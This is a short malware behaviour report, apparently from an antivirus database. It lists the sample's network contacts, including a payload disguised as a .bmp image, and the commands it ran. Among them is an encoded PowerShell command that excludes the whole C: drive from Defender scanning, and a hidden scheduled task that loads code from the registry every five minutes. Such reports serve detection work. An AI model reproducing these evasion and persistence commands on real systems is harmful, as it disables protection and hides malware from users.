Техническая информация
- <SYSTEM32>\tasks\f700
- 'ta###grdev.com':80
- 'microsoft.com':80
- 'ha###.mine.nu':7000
- http://ta###grdev.com/loader/uploads/Ghsxqtj_Kzwryroq.bmp
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- 'ha###.mine.nu':7000
- DNS ASK ta###grdev.com
- DNS ASK microsoft.com
- DNS ASK ha###.mine.nu
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAJwA=' (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /create /f /sc minute /mo 5 /tn F700 /tr "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load((Get-ItemProperty HKCU:\Software\F700\).F700...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAJwA=
- '<SYSTEM32>\schtasks.exe' /create /f /sc minute /mo 5 /tn F700 /tr "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load((Get-ItemProperty HKCU:\Software\F700\).F700...